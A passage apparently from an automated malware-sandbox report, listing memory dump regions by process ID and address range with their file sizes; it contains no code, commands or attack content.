                                                                                                                                                              • memory/2480-215-0x0000000009E70000-0x000000000A39C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                5.2MB

                                                                                                                                                              • memory/2480-214-0x0000000009770000-0x0000000009932000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.8MB

                                                                                                                                                              • memory/2788-1471-0x0000000000400000-0x0000000000B5A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                7.4MB

                                                                                                                                                              • memory/2788-244-0x0000000000400000-0x0000000000B5A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                7.4MB

                                                                                                                                                              • memory/3124-1553-0x0000019094B00000-0x0000019094B5C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                368KB

                                                                                                                                                              • memory/3124-1550-0x0000019094AA0000-0x0000019094AAE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                56KB

                                                                                                                                                              • memory/3124-1549-0x0000019094680000-0x0000019094696000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                88KB

                                                                                                                                                              • memory/4160-1559-0x000001C69B120000-0x000001C69B142000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                136KB

                                                                                                                                                              • memory/4200-88-0x0000000000400000-0x0000000000536000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.2MB

                                                                                                                                                              • memory/4200-112-0x0000000000400000-0x0000000000536000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.2MB

                                                                                                                                                              • memory/4200-89-0x0000000000400000-0x0000000000536000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.2MB

                                                                                                                                                              • memory/4200-91-0x0000000000400000-0x0000000000536000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.2MB

                                                                                                                                                              • memory/4200-92-0x0000000000400000-0x0000000000536000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.2MB

                                                                                                                                                              • memory/4264-152-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-20-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-243-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-22-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-21-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-213-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-211-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-18-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4264-19-0x0000000000CD1000-0x0000000000CFF000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                184KB

                                                                                                                                                              • memory/4768-43-0x0000000008550000-0x000000000865A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.0MB

                                                                                                                                                              • memory/4768-44-0x0000000006C70000-0x0000000006C82000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                72KB

                                                                                                                                                              • memory/4768-42-0x0000000006D90000-0x00000000073A8000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                6.1MB

                                                                                                                                                              • memory/4768-40-0x0000000005790000-0x0000000005822000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                584KB

                                                                                                                                                              • memory/4768-39-0x0000000005C80000-0x0000000006226000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                5.6MB

                                                                                                                                                              • memory/4768-45-0x0000000006CD0000-0x0000000006D0C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                240KB

                                                                                                                                                              • memory/4768-46-0x0000000006D20000-0x0000000006D6C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                304KB

                                                                                                                                                              • memory/4768-38-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                328KB

                                                                                                                                                              • memory/4768-41-0x0000000005840000-0x000000000584A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                              • memory/4820-17-0x0000000000890000-0x0000000000D49000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4820-0-0x0000000000890000-0x0000000000D49000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4820-4-0x0000000000890000-0x0000000000D49000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/4820-2-0x0000000000891000-0x00000000008BF000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                184KB

                                                                                                                                                              • memory/4820-1-0x0000000077476000-0x0000000077478000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                8KB

                                                                                                                                                              • memory/4820-3-0x0000000000890000-0x0000000000D49000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/5204-1642-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/5204-1946-0x0000000000CD0000-0x0000000001189000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/5424-1619-0x0000000006B50000-0x0000000006B72000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                136KB

                                                                                                                                                              • memory/5572-1639-0x0000000000BA0000-0x0000000001248000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                6.7MB

                                                                                                                                                              • memory/5572-1608-0x0000000000BA0000-0x0000000001248000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                6.7MB

                                                                                                                                                              • memory/6004-1450-0x000000006CBE0000-0x000000006CC2C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                304KB

                                                                                                                                                              • memory/6004-1460-0x0000000006DD0000-0x0000000006E74000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                656KB

                                                                                                                                                              • memory/6004-1472-0x0000000007250000-0x0000000007258000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                32KB

                                                                                                                                                              • memory/6004-1447-0x00000000056E0000-0x0000000005A37000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                3.3MB

                                                                                                                                                              • memory/6004-1448-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                120KB

                                                                                                                                                              • memory/6004-1459-0x0000000006DA0000-0x0000000006DBE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                120KB

                                                                                                                                                              • memory/6004-1435-0x0000000004730000-0x0000000004766000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                216KB

                                                                                                                                                              • memory/6004-1449-0x0000000006190000-0x00000000061C4000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                208KB

                                                                                                                                                              • memory/6004-1438-0x0000000005510000-0x0000000005576000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                408KB

                                                                                                                                                              • memory/6004-1437-0x0000000005470000-0x0000000005492000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                136KB

                                                                                                                                                              • memory/6004-1468-0x0000000007160000-0x0000000007175000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                84KB

                                                                                                                                                              • memory/6004-1469-0x0000000007260000-0x000000000727A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                104KB

                                                                                                                                                              • memory/6004-1467-0x0000000007150000-0x000000000715E000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                56KB

                                                                                                                                                              • memory/6004-1466-0x0000000007120000-0x0000000007131000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                68KB

                                                                                                                                                              • memory/6004-1465-0x00000000071A0000-0x0000000007236000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                600KB

                                                                                                                                                              • memory/6004-1464-0x0000000006F90000-0x0000000006F9A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                              • memory/6004-1462-0x0000000006F10000-0x0000000006F2A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                104KB

                                                                                                                                                              • memory/6004-1461-0x0000000007550000-0x0000000007BCA000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                6.5MB

                                                                                                                                                              • memory/6004-1436-0x0000000004E40000-0x000000000546A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                6.2MB